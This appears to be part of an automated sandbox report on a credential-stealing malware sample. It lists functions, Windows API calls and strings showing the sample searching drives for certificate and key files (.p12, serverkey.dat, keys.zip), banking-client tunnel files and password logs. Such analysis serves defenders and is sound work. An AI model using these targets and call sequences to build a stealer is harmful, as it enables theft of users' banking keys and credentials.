                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C91291
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C91299
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(00000000), ref: 02C912AA
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C912B1
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 02C912F4
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(00000000), ref: 02C91340
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA718,00000000,00000000), ref: 02C91387
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$BackslashDirectoryErrorFileLastmemset$AdminAttributesCreateCurrentFolderMakeModuleNameSystemUser
                                                                                                                                                                                                            • String ID: 6D1DA718$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$P0Wu$\$\SIGN1\$client.zip$keys.zip$path_client.txt$path_keys.txt
                                                                                                                                                                                                            • API String ID: 1576442920-4172027252
                                                                                                                                                                                                            • Opcode ID: 082f09d6388cbf58c96b8d781d757390221bba64b3a40321ac2578f470d1a12b
                                                                                                                                                                                                            • Instruction ID: 6cf4f9e84f40e98a3ba9a695ee025706ec90e138cbbabd429458fd5191a74a5b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 082f09d6388cbf58c96b8d781d757390221bba64b3a40321ac2578f470d1a12b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C6D129309442968FDF168F24D85DBE67BE9EF85304F1886D4E88DD7241DBB1DA48CB90
                                                                                                                                                                                                            Function 02C8BB20 Relevance: 56.3, APIs: 24, Strings: 8, Instructions: 345fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C8BB47
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C8BB69
                                                                                                                                                                                                            • GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02C8BB88
                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 02C8BBA1
                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(?), ref: 02C8BBF5
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02C8BC04
                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 02C8BC51
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 02C8BC6A
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,found.), ref: 02C8BC81
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,asus), ref: 02C8BC98
                                                                                                                                                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 02C8BCAF
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA3E6), ref: 02C8BCE4
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8BD1E
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8BD28
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8BD30
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8BD3F
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8BD46
                                                                                                                                                                                                            • SetErrorMode.KERNEL32(?), ref: 02C8BF52
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Error$File$DirectoryDriveFindLastModePathmemset$AdminAttributesBackslashCreateCurrentFirstFolderLogicalMakeNextStringsSystemTypeUser
                                                                                                                                                                                                            • String ID: *.00*$.txt$.zip$6D1DA3E6$asus$found.$keys$path
                                                                                                                                                                                                            • API String ID: 3801700313-3819906757
                                                                                                                                                                                                            • Opcode ID: 2ccc76992e657d32ddd7d02eb9622968297ea05fd662e1f6c6d1d3d8a7a41782
                                                                                                                                                                                                            • Instruction ID: eb0aa9984d832d5777501823ad65b4b7dba08da0154381e56215e5f837fe31a9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2ccc76992e657d32ddd7d02eb9622968297ea05fd662e1f6c6d1d3d8a7a41782
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FFC1F4315087818FC716DF3894687ABBBE5AFC9348F188A5DE9C9C7250EB31DA09C791
                                                                                                                                                                                                            Function 02C8D0C0 Relevance: 56.3, APIs: 24, Strings: 8, Instructions: 345fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C8D0E7
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C8D109
                                                                                                                                                                                                            • GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02C8D128
                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 02C8D141
                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(?), ref: 02C8D195
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02C8D1A4
                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 02C8D1F1
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 02C8D20A
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,found.), ref: 02C8D221
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,asus), ref: 02C8D238
                                                                                                                                                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 02C8D24F
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA354), ref: 02C8D284
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8D2BE
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8D2C8
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8D2D0
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8D2DF
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8D2E6
                                                                                                                                                                                                            • SetErrorMode.KERNEL32(?), ref: 02C8D4F2
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Error$File$DirectoryDriveFindLastModePathmemset$AdminAttributesBackslashCreateCurrentFirstFolderLogicalMakeNextStringsSystemTypeUser
                                                                                                                                                                                                            • String ID: *.00*$.txt$.zip$6D1DA354$asus$found.$keys$path
                                                                                                                                                                                                            • API String ID: 3801700313-2841153246
                                                                                                                                                                                                            • Opcode ID: 425eb8cc08128ed1b95f4e296e8d3dab3b1afadf694fd2b6d9cf7f05b51b0efc
                                                                                                                                                                                                            • Instruction ID: aa9f37e62b3eb9a5c461c1e9d8a0575e99d5f0c0cb5e9c87025faf26779bf6c5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 425eb8cc08128ed1b95f4e296e8d3dab3b1afadf694fd2b6d9cf7f05b51b0efc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4AC1D8715087818FC716DF349858BABBBE5AFC5349F148A5DE8CAD7280EB30D609C792
                                                                                                                                                                                                            Function 02C7BE40 Relevance: 54.6, APIs: 29, Strings: 2, Instructions: 342windowCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 02C7BE9A
                                                                                                                                                                                                            • IsIconic.USER32(?), ref: 02C7BEA5
                                                                                                                                                                                                            • GetWindowInfo.USER32(?,?), ref: 02C7BF02
                                                                                                                                                                                                            • GetAncestor.USER32(?,00000003,?,755730D0), ref: 02C7BF27
                                                                                                                                                                                                            • GetWindow.USER32(?,00000003), ref: 02C7BFA0
                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 02C7BFC8
                                                                                                                                                                                                            • IsIconic.USER32(?), ref: 02C7BFD3
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C7C002
                                                                                                                                                                                                            • GetWindow.USER32(?,00000005), ref: 02C7C026
                                                                                                                                                                                                            • GetWindow.USER32(00000000), ref: 02C7C029
                                                                                                                                                                                                              • Part of subcall function 02C7CC80: GetClassNameA.USER32(?,?,00000101), ref: 02C7CC96
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$Iconic$AncestorClassInfoNamememset
                                                                                                                                                                                                            • String ID: <$<
                                                                                                                                                                                                            • API String ID: 3351429209-213342407
                                                                                                                                                                                                            • Opcode ID: 282933c1f680c8cb9f3700dd2a73de88c1a8472c9d72b5b6ea3dba8f9ddf64ca
                                                                                                                                                                                                            • Instruction ID: c43446ad1351886e48742841b18c3635539a3145da3112e01542b0426cebb2c5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 282933c1f680c8cb9f3700dd2a73de88c1a8472c9d72b5b6ea3dba8f9ddf64ca
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 18D1D470D00219AFDB26CFA5DC84BAEBBB9EF84708F14465AE505A7280DB709F41CF91
                                                                                                                                                                                                            Function 02C8BBE9 Relevance: 49.3, APIs: 20, Strings: 8, Instructions: 294fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(?), ref: 02C8BBF5
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02C8BC04
                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 02C8BC51
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 02C8BC6A
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,found.), ref: 02C8BC81
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,asus), ref: 02C8BC98
                                                                                                                                                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 02C8BCAF
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA3E6), ref: 02C8BCE4
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8BD1E
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8BD28
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8BD30
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8BD3F
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8BD46
                                                                                                                                                                                                            • SetErrorMode.KERNEL32(?), ref: 02C8BF52
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorFile$DirectoryFindLastPath$AdminAttributesBackslashCreateCurrentDriveFirstFolderMakeModeNextSystemTypeUser
                                                                                                                                                                                                            • String ID: *.00*$.txt$.zip$6D1DA3E6$asus$found.$keys$path
                                                                                                                                                                                                            • API String ID: 3516781098-3819906757
                                                                                                                                                                                                            • Opcode ID: 1f52f668baf0c2e699368ab5db4ddecb56b2d5b78d591a07ef66356118f56ea5
                                                                                                                                                                                                            • Instruction ID: 663f24dd68829ed58e38b891f7cb07a8d44e847048a019257ef6a73785fdd551
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f52f668baf0c2e699368ab5db4ddecb56b2d5b78d591a07ef66356118f56ea5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D0A1E4315087868FC716DB3494687ABBBE5EFC934DF188A59E8C9C7210EB31DA09C791
                                                                                                                                                                                                            Function 02C8D189 Relevance: 49.3, APIs: 20, Strings: 8, Instructions: 294fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(?), ref: 02C8D195
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02C8D1A4
                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 02C8D1F1
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 02C8D20A
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,found.), ref: 02C8D221
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,asus), ref: 02C8D238
                                                                                                                                                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 02C8D24F
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA354), ref: 02C8D284
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8D2BE
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8D2C8
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8D2D0
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8D2DF
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8D2E6
                                                                                                                                                                                                            • SetErrorMode.KERNEL32(?), ref: 02C8D4F2
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorFile$DirectoryFindLastPath$AdminAttributesBackslashCreateCurrentDriveFirstFolderMakeModeNextSystemTypeUser
                                                                                                                                                                                                            • String ID: *.00*$.txt$.zip$6D1DA354$asus$found.$keys$path
                                                                                                                                                                                                            • API String ID: 3516781098-2841153246
                                                                                                                                                                                                            • Opcode ID: 7e1c5c9da2f9c3035f93d04b31bb37274a3f15e89969deb067b6893d67ad4339
                                                                                                                                                                                                            • Instruction ID: ab943dccc9a927d00b5d65f13d034dea180e4f10a05dfd6fd7655d91402de88a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7e1c5c9da2f9c3035f93d04b31bb37274a3f15e89969deb067b6893d67ad4339
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 30A1F8315087858FC716DB349468BABBBE5AFC5349F18CA58E8CAC7240EB31D509C791
                                                                                                                                                                                                            Function 02C71180 Relevance: 44.0, APIs: 21, Strings: 4, Instructions: 203memorythreadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C7119E
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,7556F570), ref: 02C711BD
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,java), ref: 02C711D5
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,.exe), ref: 02C711EB
                                                                                                                                                                                                            • StrStrIW.SHLWAPI(?,.p12,00000000), ref: 02C7120F
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02C71231
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?), ref: 02C7124E
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C71255
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C71265
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02C71281
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C89ED0,00000000,00000000,00000000), ref: 02C71295
                                                                                                                                                                                                            • StrStrIW.SHLWAPI(?,serverkey.dat,00000000), ref: 02C712B4
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02C712E5
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?), ref: 02C71302
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C71309
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C71319
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02C71335
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C8D540,00000000,00000000,00000000), ref: 02C71349
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C8EB60,00000000,00000000,00000000), ref: 02C71386
                                                                                                                                                                                                              • Part of subcall function 02C89E20: PathAddBackslashA.SHLWAPI(6d1da3b2), ref: 02C89E47
                                                                                                                                                                                                              • Part of subcall function 02C89E20: PathFileExistsA.SHLWAPI(?), ref: 02C89EB0
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C7139E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C713AF
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ByteCharHeapMultiWide$CreateThreadmemset$AllocFileHandlePathProcess$BackslashCloseExistsInformationModuleName
                                                                                                                                                                                                            • String ID: .exe$.p12$java$serverkey.dat
                                                                                                                                                                                                            • API String ID: 183229269-3502489836
                                                                                                                                                                                                            • Opcode ID: f680c842c16c72ab64df9a65bb09bd1b379547037e350193ea1be9a47f736af0
                                                                                                                                                                                                            • Instruction ID: 11bba8a6c2a8effb5c3e6ee5715992e5dc9e33b41e28deec2c99e8fae3ac34ab
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f680c842c16c72ab64df9a65bb09bd1b379547037e350193ea1be9a47f736af0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9151E671E8522576EB319A618C49FEB7E6CDF81B55F184354BD0DAA1C0EBB0DA00CAF4
                                                                                                                                                                                                            Function 02C8B810 Relevance: 40.5, APIs: 17, Strings: 6, Instructions: 248COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02C93170: memset.MSVCRT ref: 02C93194
                                                                                                                                                                                                              • Part of subcall function 02C93170: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02C9319F
                                                                                                                                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,ctunnel.exe,?,75497390,?), ref: 02C8B83C
                                                                                                                                                                                                            • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 02C8B85B
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8B86D
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C8B87E
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA3E6), ref: 02C8B8A7
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8B8E1
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8B8EB
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8B8F3
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8B904
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8B90B
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 02C8B941
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02C8B980
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA3E6,?,?), ref: 02C8B9C7
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA3E6,ctunnel.exe,?,75497390,?), ref: 02C8BAA7
                                                                                                                                                                                                            • PathFileExistsA.SHLWAPI(?), ref: 02C8BB09
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$BackslashFile$CreateDirectoryErrorHandleLast$AdminAttributesCloseCurrentExistsFolderInformationMakeModuleNameOpenProcessSnapshotSystemToolhelp32Usermemset
                                                                                                                                                                                                            • String ID: 6D1DA3E6$\$ctunnel.exe$ctunnel.zip$pass.log$path_ctunnel.txt
                                                                                                                                                                                                            • API String ID: 3886636124-4147626819
                                                                                                                                                                                                            • Opcode ID: 367deeb493a039c938df00037e45f8181f248d5d1c5ccded8f08640811a96183
                                                                                                                                                                                                            • Instruction ID: 9745a22860d5e6ba97636dfaab07f19f23a1992d8541023edbfad4e199ed9e66
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 367deeb493a039c938df00037e45f8181f248d5d1c5ccded8f08640811a96183
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BB9139309446598FDB16DB24A858BE6BBF8EF86308F14C7D4E889D7241DB30DE49CB90
                                                                                                                                                                                                            Function 02C90BE0 Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 165stringsynchronizationsleepCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02C90C10
                                                                                                                                                                                                            • PathFindFileNameA.SHLWAPI(?), ref: 02C90C1D
                                                                                                                                                                                                            • PathFileExistsA.SHLWAPI(ISClient.cfg), ref: 02C90C32
                                                                                                                                                                                                              • Part of subcall function 02C76570: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C76596
                                                                                                                                                                                                              • Part of subcall function 02C76570: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765B7
                                                                                                                                                                                                              • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765DD
                                                                                                                                                                                                              • Part of subcall function 02C76570: RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765E4
                                                                                                                                                                                                              • Part of subcall function 02C76570: memset.MSVCRT ref: 02C765F4
                                                                                                                                                                                                              • Part of subcall function 02C76570: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76616
                                                                                                                                                                                                              • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76622
                                                                                                                                                                                                              • Part of subcall function 02C76570: HeapValidate.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76629
                                                                                                                                                                                                              • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76636
                                                                                                                                                                                                              • Part of subcall function 02C76570: HeapFree.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C7663D
                                                                                                                                                                                                              • Part of subcall function 02C76570: GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C7665D
                                                                                                                                                                                                              • Part of subcall function 02C76570: CloseHandle.KERNEL32(00000000), ref: 02C7666E
                                                                                                                                                                                                              • Part of subcall function 02C76570: IsBadWritePtr.KERNEL32(?,00000004), ref: 02C7667E
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,GKUZ=,?,00000000,00000001), ref: 02C90C7D
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C90C9D
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C90CAF
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}), ref: 02C90CDE
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 02C90CEF
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C90CF6
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C90D08
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C90D19
                                                                                                                                                                                                            • GetPrivateProfileStringA.KERNEL32(General,DefaultPrivateDir,00000000,?,00000104,?), ref: 02C90D67
                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 02C90D7E
                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 02C90D87
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
